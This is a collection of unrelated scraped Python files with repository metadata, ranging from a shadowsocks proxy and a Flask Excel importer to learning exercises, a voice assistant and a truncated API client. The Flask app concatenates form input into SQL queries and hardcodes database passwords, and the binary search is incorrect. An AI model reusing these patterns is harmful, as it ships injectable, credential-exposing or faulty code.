self._handler.handle_connection_lost(exc)\n\n\nclass RemoteTCP(asyncio.Protocol):\n def __init__(self, local_handler):\n super().__init__()\n self.local = local_handler\n self.peer = None\n self._transport = None\n self.ready = False\n self._is_closing = False\n self.cipher_man = None\n\n def write(self, data):\n if not self._transport.is_closing():\n self._transport.write(data)\n\n def close(self):\n if self._is_closing:\n return\n self._is_closing = True\n\n self._transport and self._transport.close()\n self.local.close()\n\n def connection_made(self, transport: asyncio.Transport):\n self._transport = transport\n self.peer = self._transport.get_extra_info(\"peername\")\n self.cipher_man = CipherMan(access_user=self.local.cipher_man.access_user, peer=self.peer)\n transport.write(self.local.connect_buffer)\n self.ready = True\n\n def data_received(self, data):\n self.local.write(self.cipher_man.encrypt(data=data))\n\n def pause_reading(self):\n self.local.transport.pause_reading()\n\n def resume_reading(self):\n self.local.transport.resume_reading()\n\n def eof_received(self):\n self.close()\n\n def connection_lost(self, exc):\n self.close()\n\n\nclass LocalUDP(asyncio.DatagramProtocol):\n \"\"\"\n Local Udp Factory\n \"\"\"\n\n def __init__(self, port):\n self.port = port\n self._protocols = {}\n self._transport = None\n\n def __call__(self):\n local = LocalUDP(self.port)\n return local\n\n def connection_made(self, transport):\n self._transport = transport\n\n def datagram_received(self, data, peername):\n if peername in self._protocols:\n handler = self._protocols[peername]\n else:\n handler = LocalHandler(self.port)\n self._protocols[peername] = handler\n handler.handle_connection_made(flag.TRANSPORT_UDP, self._transport, peername)\n\n handler.handle_data_received(data)\n\n def error_received(self, exc):\n # TODO clean udp conn\n pass\n\n\nclass RemoteUDP(asyncio.DatagramProtocol):\n def __init__(self, addr, port, data, local_hander):\n super().__init__()\n self.addr = addr\n self.port = port\n self.data = data\n self.local = local_hander\n self.peer = None\n self._transport = None\n self.cipher_man = None\n self._is_closing = False\n\n def write(self, data):\n self._transport and not self._transport.is_closing() and self._transport.sendto(data)\n\n def close(self):\n if self._is_closing:\n return\n\n self._is_closing = True\n self._transport and self._transport.close()\n del self.local\n\n def connection_made(self, transport):\n self._transport = transport\n self.peer = self._transport.get_extra_info(\"peername\")\n self.write(self.data)\n\n def datagram_received(self, data, peer, *args):\n if not self.cipher_man:\n self.cipher_man = CipherMan(access_user=self.local.cipher_man.access_user, ts_protocol=flag.TRANSPORT_UDP)\n\n assert self.peer == peer\n # 源地址和端口\n bind_addr = peer[0]\n bind_port = peer[1]\n if \".\" in bind_addr:\n addr = socket.inet_pton(socket.AF_INET, bind_addr)\n elif \":\" in bind_addr:\n addr = socket.inet_pton(socket.AF_INET6, bind_addr)\n else:\n raise Exception(\"add not valid\")\n port = struct.pack(\"!H\", bind_port)\n # 构造返回的报文结构\n data = b\"\\x01\" + addr + port + data\n data = self.cipher_man.encrypt(data)\n self.local.write(data)\n\n def error_received(self, exc):\n self.close()\n\n def connection_lost(self, exc):\n self.close()\n","repo_name":"laoshan-tech/shadowsocks-async","sub_path":"shadowsocks/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":10424,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"62"} +{"seq_id":"11988922661","text":"\"\"\"\nloops.py\n\nDescription:\n Examples of different for loops sorted by data type\n 1. Integers/static values\n 2. Strings\n 3. Lists\n\"\"\"\n\n\"\"\" INTEGERS \"\"\"\ndef integer_loop():\n # Iterates thru loop 10 times adding by i to result and prints result\n integer = 10\n result = 0\n \n for i in range(integer):\n result += i\n print(result) # output: 45\n\n\"\"\" STRINGS \"\"\"\ndef string_loop_1():\n # Iterates thru string, adding character to end of new_string and printing after\n input_string = \"hello\"\n new_string = \"\"\n\n for char in input_string:\n new_string += char\n \n print(new_string) # output: hello\n\ndef string_loop_2():\n # Does same as `string_loop_1`\n input_string = \"hello\"\n new_string = \"\"\n\n for i in range(len(input_string)):\n new_string += input_string[i]\n \n print(new_string) # output: hello\n\n\n\"\"\" LISTS \"\"\"\ndef list_loop_1():\n # Takes list, multiplies each item by 2 and prints final result\n input_list = [1,2,3,4]\n\n for i in range(len(input_list)):\n input_list[i] *= 2\n \n print(input_list) # output: [2,4,6,8]\n\ndef list_loop_2():\n # Same as `list_loop_1` yet item does not actually get multiplied by 2\n input_list = [1,2,3,4]\n\n for item in input_list:\n item *= 2\n # Items are still able to be accessed this way and is still useful!!\n\n print(input_list) # output: [1,2,3,4]\n \n\ndef print_formatter(title):# Helper function\n print(f\"\\n**********************************************\\n{title}\\n\")\n\n\ndef main():\n\n print_formatter(\"integer_loop:\")\n\n integer_loop()\n\n print_formatter(\"string_loop_1:\")\n\n string_loop_1()\n\n print_formatter(\"string_loop_2:\")\n\n string_loop_2()\n\n print_formatter(\"list_loop_1:\")\n\n list_loop_1()\n\n print_formatter(\"list_loop_2:\")\n\n list_loop_2()\n\nmain()","repo_name":"dborah123/demo2-repo2","sub_path":"loops.py","file_name":"loops.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"25163117052","text":"def bin_search(items,x):\n i = 0\n j = len(items)\n m = int(j/2)\n\n while items[m] != x and i<=j:\n if x > items[m]:\n i = m+1\n else:\n i = m-1\n m = int((i +j)/2)\n\n return i\n\nprint (bin_search([1,2,3,4,6,7,8,9],9))\n\n","repo_name":"mikolavlz/lerning","sub_path":"lesson 19/algoritms/bin_search.py","file_name":"bin_search.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"62"} +{"seq_id":"24487009832","text":"# encoding: utf-8\r\n'''\r\n@author: fengding\r\n@email: 924070845@qq.com\r\n@software: PyCharm\r\n@file: 第九次作业3.py\r\n@time: 2018/8/7 17:31\r\n@desc:\r\n'''\r\n\r\nclass Cla:\r\n def __init__(self, name, age):\r\n self.name = name\r\n self.age = age\r\n print(\"初始化成功\")\r\n\r\n def __del__(self):\r\n print(\"调用销毁~\")\r\n\r\nif __name__ == '__main__':\r\n\r\n mm = Cla(\"韩梅梅\", 10)\r\n ll = Cla(\"李 雷\", 11)\r\n bzr = Cla(\"班主任\", 40)\r\n del bzr\r\n xz = Cla(\"校长\", 50)\r\n\r\n print(\"程序最后一行代码~~~~\\n————————————————\")\r\n\r\n","repo_name":"924070845/TanzhouPythonVipFirstClass","sub_path":"作业/第九次作业3.py","file_name":"第九次作业3.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"7315467295","text":"# -*- coding: UTF-8 -*-\nfrom flask import Flask, render_template, url_for, app, request, flash, redirect\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import create_engine\nimport datetime, xlrd, os, shutil\nfrom xlrd import open_workbook\nfrom shutil import move\nimport psycopg2\n\n\ndb = create_engine('postgresql://postgres:123456@localhost:5432/postgres')\n\n\n\napplication = Flask(__name__)\napplication.config['SQLALCHEMY_DTABASE_URI'] = \"posgresql://postgres:123456@localhost:5432/postgres\"\n#db = SQLAlchemy(app)\n\n\n@application.route('/')\n@application.route('/main')\ndef index():\n datestart = \"2000-01-01\"\n dateend = \"2030-01-01\"\n result_set = db.execute(\"SELECT type, sum(count) as count FROM vw_stat where date(date_req) between date('\" + datestart + \"') and date('\" + dateend + \"') group by type order by count desc;\")\n return render_template('about.html', result_set=result_set)\n\n\n@application.route('/import_table', methods=['POST', 'GET'])\ndef import_xls():\n excel_type_check = 2\n datestart = \"2000-01-01\"\n dateend = \"2030-01-01\"\n messages_file_not_found = ['Файл \".xlsx/.xls\" не найден! Попробуйте еще раз!']\n messages_success = ['Добавление данных в таблицу БД выполнено успешно!']\n messages_bd_error = ['Не удалось подключиться к БД!']\n messages_general = ['Загружено:']\n if request.method == 'POST':\n failed1_print = 0\n try:\n con = psycopg2.connect(dbname='new1', user='postgres',\n password='Qwertyasdfsega161', host='localhost')\n except:\n return render_template('import.html', messages_bd_error=messages_bd_error)\n print('Не удалось подключиться к базе данных!')\n cur = con.cursor()\n excel_check = 0\n while excel_check == 0:\n try:\n for file in os.listdir(\"./\"):\n if file.endswith(\".xlsx\"):\n excel_full_name = os.path.join(\"./\", file)\n excel_name = excel_full_name[2::]\n elif file.endswith(\".xls\"):\n excel_full_name = os.path.join(\"./\", file)\n excel_name = excel_full_name[2::]\n excel = open_workbook(excel_full_name)\n sheet = excel.sheet_by_index(0)\n #excel_type_check = 0\n break\n except:\n return render_template('import.html', messages_file_not_found=messages_file_not_found)\n #print('Файл \".xlsx/.xls\" не найден! Попробуйте еще раз!')\n break\n\n\n now_time = datetime.datetime.now()\n\n type1 = ''\n\n data_time = sheet.col_values(0)\n tagid = sheet.col_values(1)\n length = sheet.col_values(2)\n ant = sheet.col_values(3)\n cnt = sheet.col_values(4)\n rssi = sheet.col_values(5)\n try:\n tagid.remove('TagID')\n length.remove('Length')\n ant.remove('Ant')\n cnt.remove('Cnt')\n rssi.remove('RSSI')\n data_time.remove('Time')\n data_date = excel_name[8:12] + '-' + excel_name[12:14] + '-' + excel_name[14:16]\n except ValueError:\n messages_value_error = [' В данном .xls/.xlsx файле, отсутствуют имена всех или одних из данных колонок: (Time/TagID/Length/Ant/Cnt/RSSI). Либо же, они были введены неправильно!']\n return render_template('import.html', messages_value_error=messages_value_error)\n\n type_check = 1\n\n for i in range(len(tagid)):\n if (tagid[i])[1] == '1':\n type1 = 'Мужчина'\n type_check = 0\n elif (tagid[i])[1] == '2':\n type_check = 0\n type1 = 'Женщина'\n elif (tagid[i])[1] == '3':\n type_check = 0\n type1 = 'Ребенок'\n elif (tagid[i])[1] == '4':\n type_check = 0\n type1 = 'Инвалид'\n elif (tagid[i])[1] == '5':\n type_check = 0\n type1 = 'Пенсионер'\n elif (tagid[i])[1] == '1' or (tagid[i])[1] == '2' or (tagid[i])[1] == '3' or (tagid[i])[1] == '4' or (tagid[i])[1] == '5':\n messages_type_error = [' Не удалось определить \"type\" по значениям в колонке \"TagID\"!']\n return render_template('import.html', messages_type_error=messages_type_error)\n type_check = 1\n break\n\n try:\n cur.execute(\"INSERT INTO test1 (data_time, tag_id, lenght, ant, cnt, rssi, type, created_date, data_date) VALUES (%(data_time)s, %(tag_id)s, %(lenght)s, %(ant)s, %(cnt)s, %(rssi)s, %(type)s, %(created_date)s, %(data_date)s)\",\n {'data_time': data_time[i], 'tag_id': tagid[i], 'lenght': length[i],\n 'ant': ant[i], 'cnt': cnt[i], 'rssi': rssi[i], 'type': type1, 'created_date': now_time,\n 'data_date': data_date})\n except psycopg2.errors.InvalidDatetimeFormat:\n messages_invalid_datetime_format = [' Не удалось верно определить дату по названию файла!']\n return render_template('import.html', messages_invalid_datetime_format=messages_invalid_datetime_format)\n if type_check == 0:\n try:\n shutil.move(excel_full_name, './old_xls')\n\n except shutil.Error:\n for num in range(999):\n try:\n os.rename('./old_xls/' + excel_name, './old_xls/' + str(num) + excel_name)\n shutil.move(excel_full_name, './old_xls')\n break\n except FileExistsError:\n num += 1\n\n #result_set_import = (SELECT )\n con.commit()\n #print('Добавление данных в таблицу БД выполнено успешно!')\n result_set = db.execute(\"SELECT type, sum(count) as count FROM vw_stat where created_date > (now() - interval '10 second') group by type order by count desc;\")\n #result_set = db.execute(\"SELECT 'hello kitty' as type, '10' as count;\")\n return render_template('import.html', messages_success=messages_success, messages_general=messages_general, result_set=result_set)\n cur = con.cursor()\n else:\n messages_type_error = [' Не удалось определить \"type\" по значениям в колонке \"TagID\"!']\n return render_template('import.html', messages_type_error=messages_type_error)\n return render_template('import.html')\n\n\n@application.route('/calendar', methods=['POST', 'GET'])\ndef calendar():\n date_default = datetime.date.today()\n date_default_end = datetime.date.today()\n a = None\n if request.method == \"POST\":\n try:\n req = request.form\n datestart = request.form['dt_start']\n dateend = request.form['dt_end']\n result_set_date = db.execute(\"SELECT type, sum(count) as count FROM vw_stat where date(date_req) between date('\" + datestart + \"') and date('\" + dateend + \"') group by type order by count desc;\")\n #print(result_set_date)\n #for i in result_set_date:\n # count_check = i.count\n # print(count_check)\n # type_check = i.type\n # print(type_check)\n if datestart > dateend:\n messages_wrong_date = [\"Дата конца раньше, чем дата начала!\"]\n return render_template('calendar.html', messages_wrong_date=messages_wrong_date, date_default=date_default, date_default_end=date_default_end)\n elif result_set_date.rowcount < 1:\n messages_empty_rows = [\"Статистика за этот период времени отсутсвует!\"]\n return render_template('calendar.html', messages_empty_rows=messages_empty_rows, date_default=date_default, date_default_end=date_default_end)\n\n date_default = datestart\n date_default_end = dateend\n return render_template('calendar.html', result_set_date=result_set_date, date_default=date_default, date_default_end=date_default_end)\n except:\n return render_template('calendar.html', date_default=date_default, date_default_end=date_default_end)\n else:\n return render_template('calendar.html', date_default=date_default, date_default_end=date_default_end)\n return render_template('calendar.html', date_default=date_default, date_default_end=date_default_end)\n\n\n\n@application.route('/user//')\ndef user(name, id):\n return 'user: ' + name + '-' + str(id)\n\n\nif __name__ == '__main__':\n application.run(debug=False)\n","repo_name":"kazantsev-s/ksa-sheep-html","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":9150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"4619686652","text":"\nimport tkinter as tk\nimport openai\nimport speech_recognition as sr\nimport os\nimport threading\nimport pyttsx3\nimport mygui\nfrom dotenv import load_dotenv\nfrom datetime import datetime\nimport pvporcupine\nimport pyaudio\nimport struct\nimport time\n\nUSER=\"sir\"\n\nnow = datetime.now()\n\ncurrent_time = now.strftime(\"%H:%M:%S\")\n\n# Load Environment variables\nload_dotenv()\n\n# Load your OpenAI API key\nopenai.api_key = os.getenv('OPEN_AI_KEY')\n\n\n# Set up the speech recognition\ndef recognize_speech():\n \n r = sr.Recognizer()\n\n with sr.Microphone(device_index=28) as source:\n print(\"Listening...\")\n audio = r.listen(source)\n while[True]:\n try:\n speech_text = r.recognize_google(audio)\n print(\"You said: \" + speech_text)\n except sr.UnknownValueError:\n print(\"Google Speech Recognition could not understand the audio\")\n except sr.RequestError as e:\n print(\"Could not request results from Google Speech Recognition service; {0}\".format(e))\n \n\n\n\n return speech_text\n\n\n\n\ndef text_to_speech(command):\n\n engine = pyttsx3.init()\n engine.say(command)\n engine.runAndWait()\n\n \ndef continuous_face():\n while True: # Keep the animation running continuously\n mygui.face()\n \ndef start_animation():\n mygui.pygame.init()\n mygui.display()\n animation_thread = threading.Thread(target=continuous_face)\n animation_thread.start()\ndef main_loop():\n\n\n mygui.pygame.init()\n mygui.display()\n \n # Start the animation in a new thread as soon as the window opens\n threading.Thread(target=continuous_face).start()\n running = True\n while running:\n for event in mygui.pygame.event.get():\n if event.type == mygui.pygame.QUIT:\n running = False\n \n # Listen for speech and check if the phrase \"hello\" was said\n\n start_speech_recognition()\n \n \n\n mygui.pygame.display.flip()\n\n mygui.pygame.quit()\n \n\ndef send_to_chatGPT(messages, model='gpt-3.5-turbo'):\n response = openai.ChatCompletion.create(\n model=model,\n messages=messages,\n max_tokens=100,\n n=1,\n stop=None,\n temperature=0.5,\n )\n message= response.choices[0].message.content\n messages.append(response.choices[0].message)\n return message\ndef start_session():\n messages=[{\"role\": \"user\", \"content\":\"Please act like Jarvis from Iron Man\"}]\n while[True]:\n text = recognize_speech()\n if (text==\"stop\"):\n mygui.pygame.quit()\n exit()\n \n \n \n else:\n messages.append({\"role\": \"user\",\"content\":text})\n response=send_to_chatGPT(messages)\n\n \n \n text_to_speech(response)\n print (response)\n\ndef start_speech_recognition():\n porcupine = None\n pa = None\n audio_stream = None\n try:\n porcupine = pvporcupine.create(keywords=[\"jarvis\",\"computer\"])\n pa = pyaudio.PyAudio()\n audio_stream= pa.open(rate= porcupine.sample_rate, channels=1, format=pyaudio.paInt16, input=True, frames_per_buffer=porcupine.frame_length)\n while True:\n pcm = audio_stream.read(porcupine.frame_length)\n pcm= struct.unpack_from(\"h\" * porcupine.frame_length, pcm)\n keyword_index = porcupine.process(pcm)\n if keyword_index >= 0:\n print(\"Hotword Detected...\", end=\"\")\n start_session()\n time.sleep[1]\n print(\"J.A.R.V.I.S Awaiting your call\"+ USER)\n finally:\n if porcupine is not None:\n porcupine.delete()\n if audio_stream is not None:\n audio_stream.close()\n if pa is not None:\n pa.terminate()\n\n\n \n\nmain_loop()\n\n","repo_name":"Aryandesai1/Jarvis-Voice-Recognition","sub_path":"ChatGPTJarvis.py","file_name":"ChatGPTJarvis.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"32842854535","text":"# Create function fib that returns n'th element of Fibonacci sequence\ndef fibonacci(n: int) -> int:\n t1 = 0\n t2 = 1\n c = 0\n t3 = 0\n if n == 1:\n return 1\n while c < n-1:\n t3 = t1 + t2\n t1 = t2\n t2 = t3\n c += 1\n return t3\n\nprint(fibonacci(2))","repo_name":"ViniciusEZ/Python","sub_path":"Codewars/7kyu/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"37209082377","text":"#!/usr/bin/python3\n\n'''\nTitle: alignments_filter_domains_from_lengths.py\nDate: 2018-01-11\nAuthor: Adam Nunn\n\nDescription:\n This program takes two input files: 1) tab-delimited file containing on each line a\n sequence ID and relative start/end positions for a pfam domain contained within the\n sequence (INPUT_LENGTHS_FILE) and 2) a fasta file containing the relevant sequence IDs\n and protein sequence on the following line (INPUT_FASTA_FILE). The output is a fasta\n file containing only the sequence IDs specified in the INPUT_LENGTHS_FILE and the\n extracted domain sequences on the following line (OUTPUT_FASTA_FILE).\n\nUsage:\n ./alignments_filter_domains_from_lengths.py INPUT_LENGTHS_FILE INPUT_FASTA_FILE OUTPUT_FASTA_FILE\neg. ./alignments_filter_domains_from_lengths.py PF00089.lengths.txt Trinity_isoH_cdhit10.fasta.transdecoder.pep PF00089.fasta\n\n'''\n\nimport sys\nimport re\n\noutseqs = []\n\nwith open(sys.argv[1], 'r') as INPUT_LENGTHS_FILE, open(sys.argv[3], 'w') as OUTPUT_FASTA_FILE:\n for info in INPUT_LENGTHS_FILE: # parse the information in the INPUT_LENGTHS_FILE by line\n info = info.rstrip()\n info = info.split(\"\\t\")\n Found = False\n INPUT_FASTA_FILE = open(sys.argv[2], 'r') # open the INPUT_FASTA_FILE to find sequences\n for line in INPUT_FASTA_FILE:\n line = line.rstrip()\n if Found == False:\n matchObject = re.search(info[0] + \":\", line)\n if matchObject: # sequence ID found in the INPUT_FASTA_FILE\n count = 1\n while (info[0] + \"__\" + str(count)) in outseqs: # check if sequence has already had domain extracted (some sequences contain domain copies)\n count += 1\n outseqs.append(info[0] + \"__\" + str(count)) # give new ID to sequence in case multiple domains are extracted from the same sequence\n print(\">\" + info[0] + \"__\" + str(count), file=OUTPUT_FASTA_FILE)\n Found = True\n else: continue # sequence ID not found, continue searching INPUT_FASTA_FILE\n else:\n start = int(info[1]) # define start position for domain\n stop = int(info[2]) # define end position for domain\n line = \"\".join(line[start:stop]) # extract domain from sequence\n print(line, file=OUTPUT_FASTA_FILE) # print domain sequence to OUTPUT_FASTA_FILE\n break\n INPUT_FASTA_FILE.close()\n","repo_name":"bio15anu/thesis","sub_path":"scripts/alignments_filter_domains_from_lengths.py","file_name":"alignments_filter_domains_from_lengths.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"18657943846","text":"try:\n print(\"start code\")\n print(error)\n print(\"end code\")\nexcept:\n print(\"no problem\")\nprint(\"any code...\")\n\n\ndef checker(var_1):\n if type(var_1)!=str:\n raise TapeError(f\"Сорі, ми не працюємо з {type(var_1)}, ам теба str\")\n else:\n return var_1\nchecker(1234)\n","repo_name":"sgudgkrfj/Try_exp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"15521998336","text":"# Script Name: time.py\n# Author: Tanmoy Debnath 121324683\n\n# get number of minutes spent watching tv\nminutes = int(input(\"How many minutes do you spend watching TV: \"))\n\n\n# save as hours \nhours = minutes // 60\n# save the remaining minutes\nminutes = minutes % 60\n\nprint(\"You spend\" , hours, \"hours and\", minutes, \"minutes watching TV.\")","repo_name":"tanmoy03/COLLEGE-WORK","sub_path":"PROGRAMMING/CS1117/lab1/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"42691974720","text":"import pathlib\nimport random\nimport copy\n\nfrom typing import List, Optional, Tuple\n\n\nCell = Tuple[int, int]\nCells = List[int]\nGrid = List[Cells]\n\n\nclass GameOfLife:\n \n def __init__(\n self,\n size: Tuple[int, int],\n randomize: bool = True,\n max_generations: Optional[float] = float('inf')\n ) -> None:\n # Размер клеточного поля\n self.rows, self.cols = size\n # Предыдущее поколение клеток\n self.prev_generation = self.create_grid()\n # Текущее поколение клеток\n self.curr_generation = self.create_grid(randomize=randomize)\n # Максимальное число поколений\n self.max_generations = max_generations\n # Текущее число поколений\n self.n_generation = 1\n\n def create_grid(self, randomize: bool = False) -> Grid:\n grid = [[0] * self.cols for _ in range(self.rows)]\n if randomize:\n for i in range(self.rows):\n for j in range(self.cols):\n grid[i][j] = randomize * (random.randint(0, 1))\n return grid\n\n def get_neighbours(self, cell: Cell) -> Cells:\n row, col = cell\n neighbours = []\n if col > 0:\n neighbours.append(self.curr_generation[row][col - 1])\n if col < self.cols - 1:\n neighbours.append(self.curr_generation[row][col + 1])\n if row > 0:\n neighbours.append(self.curr_generation[row - 1][col])\n if col > 0:\n neighbours.append(self.curr_generation[row - 1][col - 1])\n if col < self.cols - 1:\n neighbours.append(self.curr_generation[row - 1][col + 1])\n if row < self.rows - 1:\n neighbours.append(self.curr_generation[row + 1][col])\n if col > 0:\n neighbours.append(self.curr_generation[row + 1][col - 1])\n if col < self.cols - 1:\n neighbours.append(self.curr_generation[row + 1][col + 1])\n\n return neighbours\n\n def get_next_generation(self) -> Grid:\n for i in range(self.rows):\n for j in range(self.cols):\n self.prev_generation[i][j] = self.curr_generation[i][j]\n new_grid = copy.deepcopy(self.curr_generation)\n for i in range(len(self.curr_generation)):\n for j in range(len(self.curr_generation[i])):\n neighbours = self.get_neighbours((i, j)).count(1)\n if neighbours == 3:\n new_grid[i][j] = 1\n elif neighbours == 2 and self.curr_generation[i][j] == 1:\n new_grid[i][j] = 1\n else:\n new_grid[i][j] = 0\n\n return new_grid\n\n def step(self) -> None:\n \"\"\"\n Выполнить один шаг игры.\n \"\"\"\n\n self.prev_generation = copy.deepcopy(self.curr_generation)\n self.curr_generation = self.get_next_generation()\n\n @property\n def is_max_generations_exceed(self) -> bool:\n \"\"\"\n Не превысило ли текущее число поколений максимально допустимое.\n \"\"\"\n if self.n_generation < self.max_generations:\n return False\n return True\n\n @property\n def is_changing(self) -> bool:\n \"\"\"\n Изменилось ли состояние клеток с предыдущего шага.\n \"\"\"\n if self.curr_generation == self.prev_generation:\n return False\n return True\n\n @staticmethod\n def from_file(filename: pathlib.Path) -> 'GameOfLife':\n \"\"\"\n Прочитать состояние клеток из указанного файла.\n \"\"\"\n grid = []\n strings = filename.read_text().split('\\n')\n rows = len(strings)\n cols = len(strings[0])\n strings = strings[:-1]\n for s in strings:\n sub_array = []\n for char in s:\n sub_array.append(int(char))\n grid.append(sub_array)\n game = GameOfLife((rows, cols), False)\n game.curr_generation = copy.deepcopy(grid)\n return game\n\n def save(self, filename: pathlib.Path) -> None:\n \"\"\"\n Сохранить текущее состояние клеток в указанный файл.\n \"\"\"\n f = open(filename, 'w')\n for s in self.curr_generation:\n for item in s:\n f.write(str(item).replace(\"'\", ''))\n f.write('\\n')\n","repo_name":"alenavee/cs102","sub_path":"homework03/life.py","file_name":"life.py","file_ext":"py","file_size_in_byte":4595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"3639528665","text":"from django.db import models\n\n\n\nclass Career(models.Model):\n image = models.ImageField(upload_to='media/')\n employers = models.IntegerField()\n youngers = models.FloatField()\n higher_education = models.IntegerField()\n specialist_in_banking = models.IntegerField()\n\n\nclass SuccessStories(models.Model):\n title = models.CharField(max_length=80, verbose_name='Title')\n text = models.TextField(verbose_name='Text')\n image = models.ImageField(upload_to='media/')\n\n\n\n\n","repo_name":"Olimjonnn/Asaka-Career","sub_path":"apps/career/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"45939727480","text":"import sys\n\ninput = sys.stdin.readline\n\nn = int(input())\ndata = input().rstrip()\nf = s = 0\nfor i in range(1, n):\n if data[i - 1] == 'S' and data[i] == 'F':\n f += 1\n elif data[i - 1] == 'F' and data[i] == 'S':\n s += 1\n\nprint(\"YES\" if f > s else \"NO\")","repo_name":"ThinkingDobby/PythonProgramming","sub_path":"codeforces/practice/year22/mon4/under1000/867A. Between the Offices.py","file_name":"867A. Between the Offices.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"11254262137","text":"from sklearn.preprocessing import LabelEncoder\nimport pandas as pd\nimport numpy as np\n\nclass DataSet(object):\n def __init__(self, x, y, seed = None, factores = None):\n np.random.seed(1 if seed is None else seed)\n self._cases = x.shape[0]\n self._x = self.encode(x)\n if factores == None:\n self._y = self.encode(y)\n else:\n self._y = self.factor_a_matriz(self.encode(y), factores)\n self._epochs_completed = 0\n self._index_in_epoch = 0\n \n @property\n def x(self):\n return self._x\n \n @property\n def y(self):\n return self._y\n \n def encode(self, data):\n if isinstance(data, pd.Series) :\n if data.dtypes == 'object' :\n le = LabelEncoder()\n data = le.fit_transform(data)\n else:\n data = data.values\n return data\n else :\n var_to_mod = data.columns[data.dtypes == 'object']\n if var_to_mod.size > 0 :\n le = LabelEncoder()\n for i in var_to_mod:\n data[i] = le.fit_transform(data[i])\n if isinstance(data, pd.DataFrame):\n return data.values\n else:\n return data\n \n def decode(self, data):\n #To do\n return None\n \n def factor_a_matriz(self, df, factores):\n df_ = df\n if isinstance(df, pd.Series):\n df_ = df.values\n if df_.shape[0] == df_.size:\n casos = df_.shape[0]\n indices = np.arange(casos) * factores \n factores_uno = np.zeros((casos, factores))\n factores_uno.flat[indices + df_.ravel()] = 1 #En cada factor mas el único valor de la etiqueta coloca un 1\n return factores_uno\n else:\n return df_\n \n def next_batch(self, batch_size, random = True):\n start = self._index_in_epoch\n if start == 0 and self._epochs_completed == 0 and random:\n perm0 = np.arange(self._cases)\n np.random.shuffle(perm0)\n \n self._x = self._x[perm0]\n self._y = self._y[perm0]\n \n if start + batch_size > self._cases:\n self._epochs_completed +=1\n rest_num = self._cases - start\n x_rest = self._x[start:self._cases]\n y_rest = self._y[start:self._cases]\n \n if random:\n perm = np.arange(self._cases)\n np.random.shuffle(perm)\n \n self._x = self._x[perm]\n self._y = self._y[perm]\n start = 0\n self._index_in_epoch = batch_size - rest_num\n end = self._index_in_epoch\n x_new_part = self._x[start:end]\n y_new_part = self._y[start:end]\n \n return np.concatenate((x_rest, x_new_part), axis = 0), np.concatenate((y_rest, y_new_part), axis = 0)\n else:\n self._index_in_epoch += batch_size\n end = self._index_in_epoch\n return self._x[start:end], self._y[start:end]\n","repo_name":"enzo-quiroz/tools-py","sub_path":"DataSet.py","file_name":"DataSet.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"6110261214","text":"\"\"\"Attachments interface\n\n Direct access to the attachments endpoint\n\n The user is not expected to use this class directly. It is an attribute of the\n :class:`Archivist` class.\n\n For example instantiate an Archivist instance and execute the methods of the class:\n\n .. code-block:: python\n\n with open(\".auth_token\", mode=\"r\", encoding=\"utf-8\") as tokenfile:\n authtoken = tokenfile.read().strip()\n\n # Initialize connection to Archivist\n arch = Archivist(\n \"https://app.rkvst.io\",\n authtoken,\n )\n with open(\"something.jpg\") as fd:\n attachment = arch.attachments.upload(fd)\n\n\"\"\"\n\n# pylint:disable=too-few-public-methods\n\n\nfrom copy import deepcopy\nfrom logging import getLogger\nfrom typing import TYPE_CHECKING, Any, BinaryIO\nfrom urllib.parse import urlparse\n\nif TYPE_CHECKING:\n from requests.models import Response\n\n # pylint:disable=cyclic-import # but pylint doesn't understand this feature\n from .archivist import Archivist\n\nfrom .constants import (\n ASSETATTACHMENTS_LABEL,\n ASSETATTACHMENTS_SUBPATH,\n ATTACHMENTS_LABEL,\n SEP,\n)\nfrom .dictmerge import _deepmerge\n\nLOGGER = getLogger(__name__)\n\n\nclass _AssetAttachmentsClient:\n \"\"\"AssetAttachmentsClient\n\n Access to attachments entities using CRUD interface. This class is usually\n accessed as an attribute of the Archivist class.\n\n Args:\n archivist (Archivist): :class:`Archivist` instance\n\n \"\"\"\n\n def __init__(self, archivist_instance: \"Archivist\"):\n self._archivist = archivist_instance\n self._public = archivist_instance.public\n self._subpath = f\"{archivist_instance.root}/{ASSETATTACHMENTS_SUBPATH}\"\n self._label = f\"{self._subpath}/{ASSETATTACHMENTS_LABEL}\"\n\n def __str__(self) -> str:\n if self._public:\n return \"AssetAttachmentsClient()\"\n\n return f\"AssetAttachmentsClient({self._archivist.url})\"\n\n def _identity(self, identity: str, attachment_id: str) -> str:\n \"\"\"Return fully qualified identity\n If public then expect a full url as argument\n\n identity looks like:\n\n 